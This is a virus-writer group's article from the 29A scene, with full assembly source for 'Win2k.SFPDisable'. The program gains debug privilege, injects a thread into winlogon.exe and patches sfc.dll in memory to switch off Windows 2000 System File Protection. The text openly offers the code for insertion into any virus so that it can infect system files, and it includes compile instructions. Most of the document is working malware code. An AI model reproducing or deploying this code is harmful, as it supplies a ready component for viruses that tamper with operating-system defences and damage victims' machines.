COMMENT# ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Win2k.SFPDisable ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ by Benny/29A and Ratter/29A ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Well, how to start? In the past, there were many ideaz how to get rid off that new feature of Windows 2000 - The System File Protection. GriYo/29A was the first one who warned us and solved that problem very smartly. Using SfcIsFileProtected API that can tell us if the file is or is not protected by operating system. Viruses used this API and if file was protected, they simply did not infect it. Next step? Disabling SFP. Someone, I can't remember who was it, found out that setting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ \Winlogon\SFCDisable to 0xFFFFFFFD disabled SFP in the next restart. In some version it worked, in some it didn't. Also, there was idea to overwrite sfp protected filez storage, but it worked only from different running OS. The question was still the same - how to get rid off that fucking SFP, right here, right now? Well, we have to know our enemy if we want to defeat him. At the start, winlogon.exe (the process that handles logining, shutdown and such shitz, it can be called like main user-level process of the system) loadz sfc.dll library. Sfc.dll at its initialization process loadz sfcfilez.dll that containz list of all protected filez. Sfc.dll will get the list and storez it in its own buffer. Winlogon.exe then registerez the file notification object and every time the directory will change in some aspect (file erase, file rename etc...), it will pass the control to sfc.dll, that will check what file was changed and if it is protected by SFP. If so, it will try to repair that file. Our idea was - patch the winlogon.exe, sfc.dll or sfcfiles.dll in the memory. But there was a small problem - how to write to service program, it's forbidden by system. After some disassembling and looking at MSDN we found out how to do it - adjust debugger access rightz to our process. After that we can do whatever will we want to do with ALL processes in the system, except the system itself. Well, that's what I call secure system, hehe. The final step was to find out where and what exactly should we patch. will it be winlogon.exe? Or Sfc.dll? Or Sfcfiles.dll? After many hourz of researching we found it. In loaded library "sfc.dll" (in winlogon.exe process) there is a code: push 0 push 1 push 1 push dword ptr [ebx] push dword ptr [ebx+4] call NtWaitForMultipleObjects -----> test eax, eax <----- !!! PATCH HERE !!! jl loc_76934195 jz loc_76934195 cmp eax, 102h jz short loc_7693408B cmp eax, [ebx+4] jnb loc_76934195 If we will patch the code by ExitThread API call, the process of file checking will be aborted. Since this time, SFP will become DISABLED! Simple, eh? ;-) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Algorithm of this program ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 1) Adjust higher priviledgez to our process, by legit API way. 2) Find Winlogon.exe in memory. 3) Alocate memory there, copy there a small "path" code and run it there. 4) Quit. In the winlogon.exe will be created new thread which will: 1) Find the code written above. 2) Patch the code by ExitThread(0) call. If the page is protected, unprotect it then. 3) Quit. It soundz very simply, but believe us, it 100%-ly worx! This very useful code can be easily inserted to any virus, into some init. procedure of the virus. Virus will be able to infect ALL system filez (except those already used ofcoz) and that IS very useful. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ How to compile it? ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ tasm32 /ml /m9 /q sfp tlink32 -Tpe -c -x -aa sfp,,,import32,sfp pewrsec sfp.exe We hope you will like our code. Enjoy it! Benny/29A -, Ratter/29A -, # .386p .model flat include include include include @pushvar macro variable, empty ;macro for pushing local next_instr ;variablez of any type ifnb %out too much arguments in macro '@pushvar' .err endif call next_instr variable next_instr: endm invoke macro api ;macro for API callz extrn api:PROC ;declare API call api ;call it... endm @SEH_SetupFrame_UnProtect macro local set_new_eh local exception_handler call set_new_eh pushad mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord] cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION jne exception_handler @pushvar
mov ebx,[ebx.ER_ExceptionInformation+4] push PAGE_READWRITE and ebx,0FFFFF000h push 2*4096 push ebx mov eax,12345678h virtual_protect_api = dword ptr $-4 call eax ;unprotect 2 pagez exception_handler: popad xor eax,eax ret set_new_eh: ;set SEH frame xor edx,edx push dword ptr fs:[edx] mov fs:[edx],esp endm .data ;some variablez token_priv dd 1 p_luid dq ? dd 2 procz dd 80h dup (?) dd ? modz dd ? mod_name db MAX_PATH dup (?) p_token dd ? tmp dd ? .code ;worm code starts Start: pushad @SEH_SetupFrame ;setup SEH frame extrn GetModuleHandleA:PROC mov eax,dword ptr [GetModuleHandleA+2] mov eax,[eax] mov [gmha],eax ;store address of API extrn VirtualProtect:PROC mov eax,dword ptr [VirtualProtect+2] mov eax,[eax] mov [virtual_protect_api],eax ;--- "" --- extrn ExitThread:PROC mov eax,dword ptr [ExitThread+2] mov eax,[eax] mov [exitthread_api],eax ;--- "" --- invoke GetCurrentProcess push offset p_token push 20h push eax invoke OpenProcessToken ;open token of our process dec eax jne err_ap push offset p_luid @pushsz 'SeDebugPrivilege' push eax invoke LookupPrivilegeValueA ;find LUID for this priv. dec eax jne err_ap push eax push eax push 10h push offset token_priv push eax push [p_token] invoke AdjustTokenPrivileges ;adjust higher priviledges ;for our process mov esi,offset procz push offset tmp push 80h push esi invoke EnumProcesses ;enumerate all running processes dec eax jne end_seh add esi,4 p_search: lodsd ;get PID test eax,eax je end_seh call analyse_process jc p_search end_seh:@SEH_RemoveFrame ;remove SEH frame popad push 0 invoke ExitProcess ;and quit analyse_process Proc pushad push eax push 0 push 43Ah invoke OpenProcess ;PID -> handle test eax,eax je err_ap mov [hProcess],eax push eax push eax mov esi,offset modz push offset tmp push 4 push esi push eax invoke EnumProcessModules ;get first (main) module pop ecx dec eax jne err_ap1 lodsd mov edi,offset mod_name push MAX_PATH push edi push eax push ecx invoke GetModuleBaseNameA ;get its name xchg eax,ecx jecxz err_ap1 @pushsz 'winlogon.exe' pop esi rep cmpsb jne err_ap1 ;quit if its not winlogon push PAGE_READWRITE push MEM_RESERVE or MEM_COMMIT push end_rroutine-start_rroutine push 0 push 12345678h hProcess = dword ptr $-4 invoke VirtualAllocEx ;aloc there a memory test eax,eax je err_ap1 xchg eax,ebx push 0 push end_rroutine-start_rroutine push offset start_rroutine push ebx push [hProcess] invoke WriteProcessMemory ;write there our code dec eax jne free_mem xor edx,edx push edx push edx push edx push ebx push edx push edx push [hProcess] invoke CreateRemoteThread ;run it push eax invoke CloseHandle invoke CloseHandle popad clc ret err_ap1:invoke CloseHandle err_ap: popad stc ret free_mem: push MEM_RELEASE push 0 push ebx push [hProcess] invoke VirtualFreeEx ;free memory jmp err_ap1 analyse_process EndP start_rroutine Proc pushad @SEH_SetupFrame_UnProtect ;set SEH frame @pushsz 'sfc.dll' mov eax,12345678h gmha = dword ptr $-4 call eax ;get sfc.dll address test eax,eax je end_rseh xchg eax,esi mov eax,[esi.MZ_lfanew] add eax,esi movzx edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader] lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)] mov ecx,[edx.SH_SizeOfRawData] ;get size of section call @s_str @b_str: db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h ;code to search & patch @s_str: pop edi s_str: pushad push @s_str-@b_str pop ecx rep cmpsb ;search for code popad je got_addr inc esi loop s_str jmp end_rseh got_addr: call e_next s_next: push 0 ;"patch" code mov eax, 12345678h exitthread_api = dword ptr $-4 call eax e_next: pop edi xchg esi,edi add edi,15 mov ecx,e_next-s_next rep movsb ;patch sfc.dll code by our code end_rseh: @SEH_RemoveFrame popad ret ;and quit end_rroutine: start_rroutine EndP ends End Start